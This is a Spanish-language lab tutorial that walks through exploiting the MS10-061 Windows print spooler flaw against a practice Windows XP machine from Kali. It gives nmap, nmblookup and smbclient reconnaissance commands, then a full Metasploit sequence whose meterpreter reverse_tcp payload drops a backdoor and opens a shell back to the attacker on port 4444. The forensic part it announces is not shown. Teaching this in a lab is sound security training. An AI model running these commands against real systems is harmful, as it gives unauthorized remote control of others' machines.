Escenario

¿Alguna vez ha oído hablar de cómo alguien fue capaz de conectarse a una impresora compartida y más tarde obtener el privilegio de administrador de esa máquina?  Bueno, los atacantes pueden usar la técnica que Stuxnet para obtener privilegios para los servidores Windows XP y Windows 2003 que comparten impresoras.  Esta lección proporcionará (1) el reconocimiento para ver esta vulnerabilidad potencial, (2) realizar la explotación, y (3) cómo recoger los archivos forenses para una investigación posterior.

¿Qué es Helix?

Helix es una distribución personalizada del CD de Knoppix Live Linux. Se centra en la respuesta de incidentes y la informática forense.  Helix es algo más que un CD de arranque en vivo. Con Helix puedes arrancar en un robusto entorno Linux que incluye (1) un kernel Linux personalizable, (2) excelente detección de hardware y (3) muchas aplicaciones dedicadas a la respuesta de incidentes y forenses.

¿Qué es la vulnerabilidad de suplantación del servicio de cola de impresión de Microsoft?

El módulo ms10_061_spoolss explota la vulnerabilidad de suplantación de servicios RPC (cola de impresión). Al realizar una solicitud RPC específica de DCE al procedimiento StartDocPrinter, un atacante puede suplantar el servicio de cola de impresión para crear un archivo.

El directorio de trabajo en ese momento es %SystemRoot%system32. Un atacante puede especificar cualquier nombre de archivo, incluyendo rutas transversales o completas de directorios. Al enviar solicitudes WritePrinter, un atacante puede controlar completamente el contenido del archivo creado.

Referencias

• http://www.osvdb.org/67988
• http://cvedetails.com/cve/2010-2729/
• http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

Requisitos para hacer esta practica

• Maquina XP
• Kali

Post requisitos

• Volatility

Que haremos en esta practica

• Descargar Helix2008R1
• Realizar escaneo de NMAP NetBios y RPC
• Realizar reconocimiento de acciones de NetBios
• Utilizar el módulo Metasploit ms10_061_spoolss para conectarse a la víctima
• Recopilar archivos forenses básicos
• Realizar capturas de memoria forense remota con Helix
• Descargar archivos forenses básicos

Lo primero que tenemos que hacer es navegar a la siguiente URL HELIX y descargar el archivo en el windows xp

Abrimos Windows XP y añadimos una impresora, puede ser Canon, HP…

Se abre un terminal Kali y ejecutamos nmap contra el xp

nmap -sS -sU -O -p137-139,445 ip_xp

Se observa que el servicio (1) netbios-ssn está abierto el puerto 139/tcp, (2) microsoft-ds es abierto el puerto 445/tcp, y (3) el sistema operativo es Windows XP

Utilizamos el nmap TCP SYN Scan (-sS) y UDP (-sU) para buscar rápidamente en el XP los puertos de NetBios 137 a 139 y 445. Tambien usamos -= (Footprint del sistema operativo), para que nos diga que sistema operativo estamos escaneando

NetBIOS es un acrónimo de sistema de entrada/salida básico de red. Ofrece servicios relacionados con la capa de sesión del modelo OSI, lo que permite es que aplicaciones en equipos independientes puedan comunicarse a través de una red de área local

Se utiliza el puerto TCP 445 para acceso directo de red de Microsoft TCP/IP sin necesidad de una capa de NetBIOS. El protocolo SMB (Server Message Block) se utiliza entre otras cosas para archivos compartidos en Windows NT / 2K/XP.

para buscar los nombre que utiliza la NetBIOS utilizaremos el comando nmblookup que realiza consultas de nombres NetBIOS y asignar direcciones IP en una red con NetBIOS sobre consultas de TCP/IP. Las opciones permiten las consultas de nombre ser dirigido en una determinada área de difusión IP o a una máquina en particular. Como se puede observar WXP es el nombre de estación de trabajo NetBIOS. Ahora tenemos la pieza final de reconocimiento para consulta NetBIOS acciones incluyendo las impresoras.

nmblookup -A ip_xp

La linea con el codigo <00> nos indica que es el nombre de la estacion de trabajo segun NetBios la linea con el codigo <20> nos indica el grupo de trabajo la linea con el codigo <01> indica el buscador por defecto

El codigo B nos esta indicando que es una red Broadcast

Acceso a los recursos SMB

smbclient -L \\WXP -I ip_xp -N

con la opcion (-L) lista los servicios que están disponibles en la estación de trabajo de NetBIOS.

Uso (-I) si el nombre NetBIOS no coincide con el nombre de host DNS de TCP/IP o si están tratando de llegar a un host de otra red.

con (-N) no solicitamos la contraseña

SMB funciona como un protocolo de red de capa de aplicación utilizado principalmente para proporcionar acceso compartido a archivos, impresoras y puertos serie

Lo importante es que está compartiendo impresoras como canon o hp

Se inicia el msfconsole

msfconsole
search ms10_061
use exploit/windows/smb/sm10_061_spoolss
info
set PAYLOAD windows/meterpreter/reverse_tcp
show options

set LHOST ip_kali
set RHOST ip_xp
set PNAME HP   (si se ha compartido con otro nombre la impresora con ese)

exploit

La puerta trasera se escrite en C:\WINDOWS\system32 y se usa para conectar y abrir una puerta trasera por el puerto 4444 en la maquina kali

el programa que ejecuta se llama en este caso RvOYs3UqrJq07a.exe